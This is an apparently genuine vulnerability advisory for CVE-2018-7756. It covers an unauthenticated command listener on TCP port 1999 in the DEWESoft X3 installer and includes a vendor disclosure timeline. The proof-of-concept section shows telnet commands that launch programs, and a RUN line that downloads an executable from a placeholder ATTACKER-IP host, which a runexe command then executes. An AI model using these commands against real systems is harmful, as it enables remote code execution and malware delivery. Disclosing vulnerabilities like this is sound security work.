100 lines
No EOL
2.8 KiB
Text
100 lines
No EOL
2.8 KiB
Text
[+] Credits: John Page (aka hyp3rlinx)
|
|
[+] Website: hyp3rlinx.altervista.org
|
|
[+] Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
|
|
[+] ISR: Apparition Security
|
|
|
|
|
|
|
|
Vendor:
|
|
=============
|
|
www.dewesoft.com
|
|
|
|
|
|
Product:
|
|
===========
|
|
DEWESoft X3 SP1 (64-bit) installer - X3
|
|
DEWESoft_FULL_X3_SP1_64BIT.exe
|
|
|
|
|
|
|
|
Vulnerability Type:
|
|
===================
|
|
Remote Internal Command Access
|
|
|
|
|
|
|
|
CVE Reference:
|
|
==============
|
|
CVE-2018-7756
|
|
|
|
|
|
|
|
Security Issue:
|
|
================
|
|
The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the "RunExeFile.exe" component does not require authentication
|
|
for sessions on TCP port 1999, which allows remote attackers to execute arbitrary code or access internal commands, as demonstrated by a
|
|
RUN command that can launch an .EXE file located at an arbitrary directory location, download an .EXE from an external URL, or Run
|
|
a "SETFIREWALL Off" command.
|
|
|
|
The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common Files\DEWESoft Shared\" after installing using the full-install.
|
|
|
|
Internal commands used by "RunExeFile.exe" for which I could not find any documentation.
|
|
|
|
RUN <ANY EXE>
|
|
RUNEX <ANY EXE>
|
|
GETFIREWALL
|
|
SETFIREWALL Off
|
|
KILL <PROCESS>
|
|
USERNAME
|
|
SHUTDOWN
|
|
SENDKEYS
|
|
LIST
|
|
DWPIPE
|
|
|
|
Exploit/POC:
|
|
=============
|
|
TELNET x.x.x.x 1999
|
|
RUN calc.exe
|
|
|
|
OR
|
|
|
|
Launch the victims browser and send them to website for a drive-by download etc.
|
|
|
|
TELNET x.x.x.x 1999
|
|
RUN http://ATTACKER-IP/DOOM.exe
|
|
|
|
Then from the TELNET session execute it from Downloads directory.
|
|
|
|
runexe c:\Users\victim\Downloads\DOOM.exe
|
|
|
|
|
|
Network Access:
|
|
===============
|
|
Remote
|
|
|
|
|
|
|
|
Severity:
|
|
=========
|
|
High
|
|
|
|
|
|
|
|
Disclosure Timeline:
|
|
=============================
|
|
Vendor Notification: February 9, 2018
|
|
Vendor "thank you for the warning. We will forward this to the developers and they will look into it" : February 19, 2018
|
|
Inform vendor of disclosure timeline : February 19, 2018
|
|
No further replys, update or addressing of the issue by vendor.
|
|
Vendor "We will assume that this issue is resolved and close the ticket." : March 6, 2018
|
|
March 10, 2018 : Public Disclosure
|
|
|
|
|
|
|
|
[+] Disclaimer
|
|
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
|
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
|
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
|
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
|
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
|
or exploits by the author or elsewhere. All content (c). |